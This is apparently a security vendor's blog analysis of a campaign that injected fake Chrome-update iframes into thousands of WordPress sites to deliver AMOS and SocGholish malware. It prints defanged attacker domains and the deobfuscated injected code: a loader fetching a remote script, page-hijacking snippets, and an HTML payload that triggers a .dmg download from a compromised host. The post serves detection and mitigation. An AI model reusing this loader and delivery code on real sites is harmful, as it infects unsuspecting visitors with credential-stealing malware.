This week we identified over 10,000 WordPress sites showing fake Google browser update pages in the browser of visitors via an iframe.
The page delivers cross-platform malware, both AMOS (Atomic macOS Stealer), which targets Apple users, and SocGholish, which targets Windows users.
These are popular and commercially available malware, and have been circulating for a while. It's generally believed that both malware variants were distributed by different groups of attackers, which this finding would contradict.
To our knowledge, it’s also the first time they’ve been delivered through a client-side attack. JavaScript loaded in the browser of the user generates the fake page in an iframe. The attackers use outdated WordPress versions and plugins to make detection more difficult for websites without a client-side monitoring tool in place.
The attackers likely used a vulnerability in a Wordpress plugin, to deliver the malicious JavaScript. This file is currently not flagged by any threat feed vendors, and neither is the domain.
Here are two of the largest domains identified across thousands of websites:
Technical details
Using our detection engine, we found an initial suspicious 3rd party JS file on the following URL:
https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js
Our platform flagged this as a malicious script with high confidence due to its highly obfuscated nature, which utilized multiple levels of encoding. This prompted further analysis, leading us to uncover a network of over +10,000 infected WordPress websites.
An example of a compromised site is available on our domain directory.
Blackshelter[.]org redirects the user to fastcloudcdn[.]com (our directory link) that hosts the malicious JavaScript.
We then identified multiple malicious scripts hosted on different domains.
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://blacksaltys[.]com/2xIsQSDP8CyeXrv78zk9FGV8lZIj9SXKVc-Mpx3O5H0" id="ms_main_script-js" defer></script>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" src="https://objmapper[.]com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e" id="ucf_main_script-js" defer></script>Several sites contain <link> elements designed to prefetch DNS for malicious domains, likely improving the performance of their operations:
<link rel='dns-prefetch' href='//rednosehorse[.]com' />
<link rel='dns-prefetch' href='//blacksaltys[.]com' />
<link rel='dns-prefetch' href='//objmapper[.]com' />
<link rel='dns-prefetch' href='//blackshelter[.]org' />A self-invoking anonymous function dynamically loads an external JavaScript file:
;(function(o, q, f, e, w, j) {
w = q.createElement(f);
j = q.getElementsByTagName(f)[0];
w.async = 1;
w.src = e;
j.parentNode.insertBefore(w, j);
})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);The external script is dynamically loaded and executed, with a query parameter (qbsfsc) containing a Unix timestamp to bypass caching mechanisms.
Observer malicious behavior
The obfuscated script executes various actions.
First, it stops all ongoing browser activity.
window.stop();
It strips attributes like class, style, id, … etc, from key HTML elements.
for (let at of [["class", "style", "lang", "id", "dir"]]) {
el.removeAttribute(at);}After, it dynamically injects the iframe into the page, displaying the fake Chrome update page.
let frame = document.createElement("iframe");
frame.srcdoc = rsd;
document.body.appendChild(frame);Analysis and Findings
Our analysis revealed that the compromised websites were running outdated versions of WordPress (6.7.1) and its plugins, which attackers may have exploited to inject malicious code.
We identified 27 malicious domains linked to this activity.
A few examples include:
- blacksaltys[.]com
- objmapper[.]com
- rednosehorse[.]com
- Blackshelter[.]org
The malicious script at https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de[.]js showed a detection rate of 17/96 on the VirusTotal Report.
During our analysis, we discovered that this campaign does not only target Windows platforms but also serves malware for macOS. We successfully downloaded a dmg file associated with the macOS malware.
MacOS and Windows malware decoded
The malware file (274efb6bb2f95deb7c7f8192919bf690d69c3f3a441c81fe2a24284d5f274973), at the time of analysis was flagged by 6 antivirus vendors.
The following code was uncovered after multiple layers of deobfuscation. It dynamically creates and downloads the AMOS (Atomic Mac OS Stealer) macOS malware file.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
</head>
<body>
<script>
(async () => {
try {
var btn = document.createElement("a");
btn.href = `hxxps://extendedstaybrunswick[.]com/wp-content/plugins/reset-wp/resty.php?eg=${Math.floor(Date.now() / 1000)}`;
btn.download = "C_6.12.4.dmg";
document.body.appendChild(btn);
parent.postMessage("loaded", "*");
window.addEventListener("message", function (event) {
if (event.data == "download") {
setTimeout(function () {
btn.click();
}, 100);
}
});
} catch (e) { }
})()
</script>
</body>
</html>The script dynamically generates a download button linked to the macOS malware payload. It listens for a "message" event with the value "download", which triggers the file download.
Here are two sources to learn more about the AMOS malware.
Additionally, here is a source to learn about the SocGholish Windows malware.
Both AMOS and SocGholish are commercially available malware and can be purchased on Telegram.
Mitigation and protection
As a first step, update your WordPress installation. Update your plugins, evaluate their use and remove unused ones. Look for the scripts and if found, delete them. Attackers leave a backdoor most of the time. Find it and remove it.
If you find these scripts on your site, we strongly recommend reviewing logs from the last 90 days to identify any indicators of compromise or malicious activity.
If you have downloaded any files from the affected websites, a thorough system cleanup is recommended to mitigate potential malware infection.
c/side can spot, alert and block client-side attacks like these due to our advanced detection engine and proxy. This attack would’ve been spotted and blocked with c/side installed, protecting unsuspecting users from the malicious malware download.
This attack underscores the importance of securing the web supply chain and maintaining updated software. Based on our analysis, we recommend the following:
You can start with c/side for free or contact us.
Full list of infected websites
Find safe links to the PublicWWW pages of the infected domains: